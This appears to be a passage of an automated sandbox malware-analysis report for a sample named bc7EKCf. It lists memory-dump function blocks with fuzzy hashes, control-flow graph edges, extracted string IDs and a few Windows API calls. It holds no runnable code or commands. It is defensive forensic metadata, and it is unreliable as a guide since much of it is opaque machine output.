                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a293382e96a9ae38ece522d47d08e4ccd979df5929aea0dd9198847b6e1ff2f6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 444160B1700204DFCB08DF79D9849BEB7AAEBC8344B14C529E809EB354DA35DC45CBA5

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 454 6fc1030-6fc103e 455 6fc107e-6fc1084 454->455 456 6fc1040-6fc1045 454->456 459 6fc108a 455->459 460 6fc140b-6fc1449 455->460 457 6fc1058 456->457 458 6fc1047-6fc1056 456->458 477 6fc1063-6fc1072 457->477 458->477 459->460 461 6fc133c-6fc1348 459->461 462 6fc115a-6fc1166 459->462 463 6fc11f4-6fc11f7 459->463 464 6fc1355-6fc135e 459->464 465 6fc1091-6fc109f 459->465 466 6fc12b2-6fc12ba 459->466 467 6fc138c-6fc1394 459->467 468 6fc134d-6fc1350 459->468 469 6fc12ef-6fc12f9 459->469 470 6fc10a8-6fc10b1 459->470 471 6fc1186-6fc118d 459->471 472 6fc12a3-6fc12ad 459->472 481 6fc1450-6fc1456 460->481 461->470 577 6fc1168 call 7953440 462->577 578 6fc1168 call 795350c 462->578 579 6fc1168 call 795355e 462->579 475 6fc11fd-6fc1212 463->475 476 6fc139b-6fc13a8 463->476 484 6fc1369-6fc1378 464->484 485 6fc1360-6fc1367 464->485 465->470 502 6fc10a1-6fc10a3 465->502 466->470 498 6fc1396-6fc139a 467->498 468->470 478 6fc130b 469->478 479 6fc12fb-6fc1309 469->479 480 6fc10b7-6fc10bf 470->480 470->481 482 6fc119f 471->482 483 6fc118f-6fc119d 471->483 472->470 475->498 538 6fc13af-6fc13bc 476->538 477->481 521 6fc1078 477->521 491 6fc1310-6fc1312 478->491 479->491 492 6fc10fa-6fc10fd 480->492 493 6fc10c1-6fc10c4 480->493 494 6fc11a4-6fc11a6 482->494 483->494 517 6fc137a-6fc137f 484->517 518 6fc1381 484->518 516 6fc1383-6fc1385 485->516 504 6fc132e-6fc1337 491->504 505 6fc1314-6fc131d 491->505 511 6fc10ff-6fc1102 492->511 512 6fc1116-6fc1119 492->512 506 6fc10dd-6fc10e3 493->506 507 6fc10c6-6fc10c8 493->507 509 6fc11dd-6fc11ef 494->509 510 6fc11a8-6fc11b2 494->510 502->498 504->470 505->481 523 6fc1323-6fc1329 505->523 526 6fc10ec-6fc10ef 506->526 527 6fc10e5 506->527 524 6fc10ca-6fc10d0 507->524 525 6fc1136-6fc1140 507->525 509->498 510->481 528 6fc11b8-6fc11be 510->528 514 6fc1108-6fc110b 511->514 515 6fc1277-6fc128f 511->515 519 6fc111f-6fc1122 512->519 520 6fc1217-6fc121a 512->520 529 6fc12bf-6fc12c6 514->529 530 6fc1111 514->530 515->498 534 6fc13fa-6fc1404 516->534 535 6fc1387 516->535 517->516 518->516 532 6fc1128-6fc112b 519->532 533 6fc1294-6fc129e 519->533 520->538 539 6fc1220-6fc1223 520->539 521->455 522 6fc116d-6fc1181 522->498 523->504 540 6fc132b 523->540 524->464 541 6fc10d6 524->541 525->470 556 6fc1146-6fc1155 525->556 542 6fc125a-6fc1272 526->542 543 6fc10f5 526->543 527->462 527->463 527->464 527->466 527->468 527->471 527->472 527->526 528->509 544 6fc11c0-6fc11d8 528->544 547 6fc12d8-6fc12ea 529->547 548 6fc12c8-6fc12cc 529->548 530->464 532->520 545 6fc1131 532->545 533->498 534->460 535->470 570 6fc13c3-6fc13cc 538->570 549 6fc122d 539->549 550 6fc1225-6fc122b 539->550 540->504 541->461 541->462 541->463 541->464 541->466 541->468 541->469 541->471 541->472 541->506 542->498 543->464 544->498 545->464 547->498 548->547 557 6fc12ce-6fc12d2 548->557 558 6fc1233-6fc123e 549->558 550->558 556->498 557->547 564 6fc13e6-6fc13f3 557->564 558->570 572 6fc1244-6fc1255 558->572 564->534 570->481 573 6fc13d2-6fc13df 570->573 572->498 573->564 577->522 578->522 579->522
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2002641772.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_6fc0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $&_q$4c^q$4c^q$4c^q$4c^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-157140308
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503d403aef2e62bc1ebbea9dbb16c3ba59dbd693b233cf8c76c3d84d36918325
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 65cc81162084c192b5d98184b410964b09411491129af638a71c16fd63295852
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503d403aef2e62bc1ebbea9dbb16c3ba59dbd693b233cf8c76c3d84d36918325
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB19F34B04612CFDB64DB29C69563E73E6FBC5769F10882ED40387782CB78E8668781

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 580 7951e70-7951e93 581 79523a1-79523eb 580->581 582 7951e99 580->582 583 79521bc-79521be 582->583 584 795211c-7952125 582->584 585 7951ebe-7951ec0 582->585 586 79520fe-7952108 582->586 587 79521de-79521e0 582->587 588 7952098-795209a 582->588 589 79520ba-79520bc 582->589 590 7951f24-7951f26 582->590 591 7951ea0-7951ea4 582->591 592 7951ee0-7951ee2 582->592 593 79520e0-79520ea 582->593 594 7952263-795226a 582->594 595 7951f02-7951f04 582->595 596 795210d-7952117 582->596 597 7951eaf-7951eb3 582->597 598 79520ef-79520f9 582->598 599 7951fa9-7951fab 582->599 600 795212a-795212c 582->600 607 79521c4-79521c8 583->607 608 79521c0-79521c2 583->608 584->594 620 7951ec6-7951edb 585->620 621 795226d-7952292 585->621 586->594 611 7952375-795239a 587->611 612 79521e6-79521f6 587->612 618 79520a0-79520a4 588->618 619 795209c-795209e 588->619 603 79520c2-79520db 589->603 604 795231d-7952342 589->604 613 79522c5-79522ea 590->613 614 7951f2c-7951f3c 590->614 708 7951ea7 call 79528b0 591->708 709 7951ea7 call 79528c0 591->709 605 7952299-79522be 592->605 606 7951ee8-7951ef7 592->606 593->594 609 7951f06-7951f08 595->609 610 7951f0a-7951f0e 595->610 596->594 638 7951eb9 597->638 598->594 601 79522f1-7952316 599->601 602 7951fb1-7951fc1 599->602 616 7952132-7952142 600->616 617 7952349-795236e 600->617 601->604 632 7951fc3-7951fc9 602->632 633 7951ffa-795200a 602->633 603->594 604->617 605->613 706 7951efa call 7953c78 606->706 707 7951efa call 7953c68 606->707 634 79521cd-79521d9 607->634 608->634 623 7951f13-7951f1f 609->623 610->623 611->581 635 79521f8-79521fe 612->635 636 795224a-7952261 612->636 613->601 626 7951f8c-7951fa4 614->626 627 7951f3e-7951f44 614->627 630 7952144-795214a 616->630 631 795218e-79521b7 616->631 617->611 639 79520a9-79520b5 618->639 619->639 620->594 621->605 623->594 626->594 645 7951f46-7951f48 627->645 646 7951f52-7951f87 627->646 648 795214c-795214e 630->648 649 7952158-7952189 630->649 631->594 651 7951fd7-7951ff5 632->651 652 7951fcb-7951fcd 632->652 654 795200c-7952012 633->654 655 7952038-7952048 633->655 634->594 657 7952200-7952202 635->657 658 795220c-7952248 635->658 636->594 637 7951eaa 637->594 638->594 639->594 645->646 646->594 648->649 649->594 651->594 652->651 665 7952014-7952016 654->665 666 7952020-7952033 654->666 668 7952076-7952093 655->668 669 795204a-7952050 655->669 657->658 658->594 665->666 666->594 668->594 683 7952052-7952054 669->683 684 795205e-7952071 669->684 674 7951efd 674->594 683->684 684->594 706->674 707->674 708->637 709->637
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$(bq$(bq$(bq$(bq$(bq$(bq$c^q$c^q$c^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3284821145
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a538d031fa59673c4e07257c941669390c73576de7ee473d20926530ebeca21
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 07b7d11f09d9a7f1d45ba3b656effe4fa8e45e8c262131f27d0dc50fd81a33ba
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a538d031fa59673c4e07257c941669390c73576de7ee473d20926530ebeca21
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39F14BB5B145258FCB08DF2DC49892A77F2BF89B04B6549A8E906DB360DF31EC45CB81

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 710 795b40f-795b41c 711 795b3b0-795b3e7 call 795b40f 710->711 712 795b41f-795b5d2 710->712 722 795b3ed-795b3ef 711->722 734 795b5d4-795b5e7 712->734 735 795b601-795b646 712->735 723 795b407-795b40e 722->723 724 795b3f1-795b3f7 722->724 725 795b3f9 724->725 726 795b3fb-795b3fd 724->726 725->723 726->723 734->735 738 795b5e9-795b5f9 734->738 743 795b662-795b671 735->743 744 795b648-795b660 735->744 738->735 745 795b67a-795b699 743->745 744->745 746 795b6b5-795b6c4 745->746 747 795b69b-795b6b3 745->747 748 795b6cd-795b6eb 746->748 747->748 749 795b6f1 748->749 750 795be2c-795be39 748->750 751 795b6f7-795b71f 749->751 754 795be91-795be9d 750->754 755 795be3b-795be69 750->755 764 795b725-795b755 751->764 765 795b91a-795b929 751->765 756 795bea7-795beb7 754->756 757 795be9f-795bea5 754->757 758 795be73-795be83 755->758 759 795be6b-795be71 755->759 762 795beb9 756->762 757->762 760 795be85-795be8f 758->760 759->760 768 795bec1-795bece 760->768 762->768 788 795b8e9-795b915 764->788 789 795b75b-795b776 764->789 771 795be06-795be14 765->771 772 795b92f-795b932 765->772 774 795bed0-795bedc 768->774 775 795bf03-795bf11 768->775 786 795be1c-795be26 771->786 779 795b93b-795bac6 772->779 777 795bee6-795bef6 774->777 778 795bede-795bee4 774->778 787 795bf13-795bf1f 775->787 781 795bef8-795bf01 777->781 778->781 822 795bdbd-795be04 779->822 823 795bacc-795bb5a 779->823 781->787 786->750 786->751 795 795bf21-795bf2b 787->795 796 795bf2d-795bf53 787->796 788->786 801 795b77c-795b8ac 789->801 802 795b8ae-795b8e4 789->802 800 795bf59-795bf67 795->800 796->800 801->788 802->788 822->786 823->822 838 795bb60-795bdb8 823->838 838->822
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 4'^q$Xbq$Xbq$Xbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1967173775
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 96505aa25380d90b66c7689e980671aa3348af1803e2946d7b1ef12829084838
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 621c3464d30e8d2d6a315816c918665d40219d273eae49578ea3ef73a130a84d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96505aa25380d90b66c7689e980671aa3348af1803e2946d7b1ef12829084838
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1928F7A650514EFCB468F98C948D59BBB2FF4D314B5680E8E60A9B232C732DC61EF50

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 854 76e5270-76e52ff 859 76e5308-76e533c 854->859 860 76e5301-76e5307 854->860 863 76e533e-76e5344 859->863 864 76e5345-76e5379 859->864 860->859 863->864 867 76e537b-76e5381 864->867 868 76e5382-76e53b8 call 76e50ec 864->868 867->868 872 76e53be-76e53f7 868->872 873 76e5463-76e5514 DuplicateHandle 868->873 880 76e53f9-76e53ff 872->880 881 76e5400-76e5462 872->881 878 76e551d-76e553a 873->878 879 76e5516-76e551c 873->879 879->878 880->881
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,?), ref: 076E5507
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2004922842.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_76e0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                                    • String ID: 162/$162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 3793708945-1333165911
                                                                                                                                                                                                                                                                                                                    • Opcode ID: eb9d4c0a40690c4a8f8fe7f92b17e1522c58d8f80d492089f20a4b7daef8cf4e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7d5e33de9e192a3c2d0b56aa02d0e4a7754fa5c07f532d8fd8b0ae805ea7dc35
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb9d4c0a40690c4a8f8fe7f92b17e1522c58d8f80d492089f20a4b7daef8cf4e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C9135B0D01309EFDB14CFAAD888A9EBBF5EF48314F14841AE41AA7361D774A845CF61

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 889 1599d84-159a9ee 897 159aa2b-159aa74 889->897 898 159a9f0-159aa28 889->898 908 159aa7b-159aaf2 CloseServiceHandle 897->908 909 159aafb-159ab23 908->909 910 159aaf4-159aafa 908->910 910->909
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(?), ref: 0159AAE5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1975550297.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_1590000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleService
                                                                                                                                                                                                                                                                                                                    • String ID: 162/$Hbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 1725840886-1295839585
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ccde2479b17756e7f0e893a36541cce871d6520695d44bd0e74d781d4ee0eee0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0f9294aed96869ee4aacd9951654a631be92bd8b3da3c7d8e16b3c2ed3d6dd0e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccde2479b17756e7f0e893a36541cce871d6520695d44bd0e74d781d4ee0eee0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD416A716007058FCB20DF69D584A9AFBF1FF88310F108969D449AB765DB78F849CBA1

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1004 8b3e8c8-8b3e8f6 1005 8b3e902-8b3e923 1004->1005 1006 8b3e8f8 1004->1006 1010 8b3eb12-8b3eb37 1005->1010 1011 8b3e929-8b3e92d 1005->1011 1006->1005 1015 8b3eb3e-8b3eb93 1010->1015 1012 8b3e939-8b3e97f 1011->1012 1013 8b3e92f-8b3e933 1011->1013 1027 8b3e981-8b3e9b9 1012->1027 1028 8b3e9c0-8b3e9d6 1012->1028 1013->1012 1013->1015 1030 8b3eba7-8b3ebaa 1015->1030 1031 8b3eb95-8b3eba0 1015->1031 1027->1028 1034 8b3e9e0-8b3e9f9 1028->1034 1035 8b3e9d8 1028->1035 1031->1030 1039 8b3ea57-8b3ea8a 1034->1039 1040 8b3e9fb-8b3ea29 1034->1040 1035->1034 1048 8b3eb05-8b3eb0f 1039->1048 1046 8b3ea2e-8b3ea3a 1040->1046 1046->1048 1050 8b3ea40-8b3ea52 1046->1050 1050->1048
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$(bq$xbq$xbq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2582918839
                                                                                                                                                                                                                                                                                                                    • Opcode ID: bdfd0e7d44010394ae25f7979f18ef9a6854216ded6e77bb8f46466a136ba9f8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 344cd3460e00d478596259e80bcf6127b2139a5f52fd26ad3584b80918ec5aa7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdfd0e7d44010394ae25f7979f18ef9a6854216ded6e77bb8f46466a136ba9f8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A61E3317002059FDB199F68C494BAE7BA2EFC5315F14856DE80A9B7A1CF36EC42CB91

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1150 7966ef8-7966f2c 1152 7966f37-7966f3b 1150->1152 1153 7966f2e-7966f35 1150->1153 1154 7966f3e-7966f72 call 7967b08 1152->1154 1153->1154 1156 7966f78-796702f 1154->1156 1166 796703a-796704b call 7968258 1156->1166 1167 7967051-796709c 1166->1167
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $id$$ref$$type$$values
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3868401434
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ee45f6c7435f7f8e13367a0ed88f7db06a6f1f5754fbf1dbb3e5f31ab92edfea
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 015151af6b8248591e5d627179f219209338a47e536faf751733d608f75180c4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee45f6c7435f7f8e13367a0ed88f7db06a6f1f5754fbf1dbb3e5f31ab92edfea
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7541A431A0060ACFDB01DF64E8556DEBB73FF85305F114225E6027B254EBB9698ACF80

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1173 7966f08-7966f2c 1175 7966f37-7966f3b 1173->1175 1176 7966f2e-7966f35 1173->1176 1177 7966f3e-796704b call 7967b08 call 7968258 1175->1177 1176->1177 1190 7967051-796709c 1177->1190
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $id$$ref$$type$$values
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3868401434
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 084f8b247ca9e60a134c0e1d2cf9e5f7536d10a2329dbed31c55a3a2f9c36c25
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b6bc074975db0c332af60345f08d2804db0fc99ea5da8b6c71a6508ce0355c30
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 084f8b247ca9e60a134c0e1d2cf9e5f7536d10a2329dbed31c55a3a2f9c36c25
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5415F31E1060A8FDB01DF64E845ADEBB73FF85305F154224E6027B294EBB9694ACF90

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1196 79640a8-79640bd call 7963df0 1199 79640d6-7964109 1196->1199 1200 79640bf-79640d5 1196->1200 1205 7964155-7964156 1199->1205 1206 796410b-7964113 1199->1206 1207 796411d-796412f 1206->1207 1209 7964131-7964133 1207->1209 1210 796413d-7964142 1207->1210 1209->1210
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: `q$$&_q$|-_q$`q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4173011731
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d8257f1a75aa81b241491975ad54b929b99b911bdee96f102652ccac5aa7eb7e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: eeb17f213637daaf44c2b463c5c28a7d389cb4c058c695180de8f73b3bd0e835
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8257f1a75aa81b241491975ad54b929b99b911bdee96f102652ccac5aa7eb7e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 871126703483B04FD7066A78582917A3FFAABC9340B1848EBE541CB391DD298C0683E2

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                    control_flow_graph 1211 6fc0448-6fc0489 1214 6fc048b-6fc049a 1211->1214 1215 6fc04a3-6fc04b9 1211->1215 1214->1215 1216 6fc049c-6fc049e 1214->1216 1217 6fc04fc-6fc050e 1215->1217 1218 6fc04bb-6fc04cf 1215->1218 1221 6fc055f-6fc0566 1216->1221 1219 6fc0510-6fc0524 1217->1219 1220 6fc0551-6fc0554 1217->1220 1225 6fc04d8-6fc04f6 1218->1225 1226 6fc04d1 1218->1226 1229 6fc052d-6fc054b 1219->1229 1230 6fc0526 1219->1230 1220->1221 1222 6fc0568-6fc0571 1221->1222 1223 6fc057a-6fc058a 1221->1223 1222->1223 1232 6fc058d-6fc059b 1223->1232 1225->1217 1226->1225 1229->1220 1230->1229 1237 6fc059d-6fc05a0 1232->1237 1238 6fc0600-6fc0625 1232->1238 1239 6fc05b2-6fc05b6 1237->1239 1240 6fc05a2-6fc05a5 1237->1240 1238->1239 1257 6fc0627-6fc063f 1238->1257 1241 6fc05b8-6fc05c5 1239->1241 1242 6fc05c7-6fc05cb 1239->1242 1244 6fc0ab8-6fc0b08 1240->1244 1245 6fc05ab 1240->1245 1241->1232 1241->1242 1246 6fc05cd-6fc05dc 1242->1246 1247 6fc05e5-6fc05e9 1242->1247 1258 6fc0b0f-6fc0b1f 1244->1258 1245->1239 1246->1247 1249 6fc05ef-6fc05fb 1247->1249 1250 6fc0b72-6fc0b8e 1247->1250 1249->1258 1263 6fc064f-6fc0651 1257->1263 1264 6fc0641-6fc064d 1257->1264 1265 6fc0b5a-6fc0b6f 1258->1265 1266 6fc0b21-6fc0b58 1258->1266 1268 6fc0657-6fc065e 1263->1268 1269 6fc0921-6fc0925 1263->1269 1264->1263 1265->1250 1266->1265 1274 6fc0664-6fc0673 1268->1274 1275 6fc0722-6fc073a 1268->1275 1272 6fc093b-6fc0948 1269->1272 1273 6fc0927-6fc0939 1269->1273 1272->1239 1289 6fc094e-6fc0976 1272->1289 1273->1272 1287 6fc097b-6fc097f 1273->1287 1274->1275 1288 6fc0679-6fc06eb 1274->1288 1277 6fc08fc 1275->1277 1278 6fc0740-6fc074c 1275->1278 1286 6fc0904-6fc091c 1277->1286 1279 6fc074e-6fc075b 1278->1279 1280 6fc0766-6fc07b2 1278->1280 1279->1286 1295 6fc0761 1279->1295 1314 6fc07b4-6fc07d9 1280->1314 1315 6fc07e0-6fc0828 1280->1315 1286->1239 1291 6fc09ae-6fc09d0 1287->1291 1292 6fc0981-6fc098f 1287->1292 1322 6fc082f-6fc0854 1288->1322 1323 6fc06f1-6fc0717 1288->1323 1289->1239 1349 6fc09d3 call 6fc0fe8 1291->1349 1350 6fc09d3 call 76eec98 1291->1350 1303 6fc0995-6fc099e 1292->1303 1304 6fc0991-6fc0993 1292->1304 1295->1239 1306 6fc09a6 1303->1306 1304->1306 1306->1291 1308 6fc09d8-6fc09da 1310 6fc085b-6fc0885 1308->1310 1311 6fc09e0-6fc0a02 call 6fc17a8 1308->1311 1328 6fc0887-6fc08ac 1310->1328 1329 6fc08b3-6fc08f5 1310->1329 1321 6fc0a08-6fc0a0a 1311->1321 1314->1315 1315->1322 1321->1239 1326 6fc0a10-6fc0a28 1321->1326 1322->1310 1323->1275 1326->1239 1328->1329 1329->1277 1349->1308 1350->1308
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2002641772.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_6fc0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$(bq$(bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2716923250
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 462a0b74e7aeaedcb167fb49be168044c668a0c7d48f9df7c2ed5a5423796c60
                                                                                                                                                                                                                                                                                                                    • Instruction ID: eb006a693cdd80b9f8062531ac26a82af29f47d7d82ad5db27ea8647536c2021
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 462a0b74e7aeaedcb167fb49be168044c668a0c7d48f9df7c2ed5a5423796c60
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9225F34A1021ACFDB54DF68D954AAE7BB2FF88310F208568E906A7365CB35EC52CF51
                                                                                                                                                                                                                                                                                                                    Strings
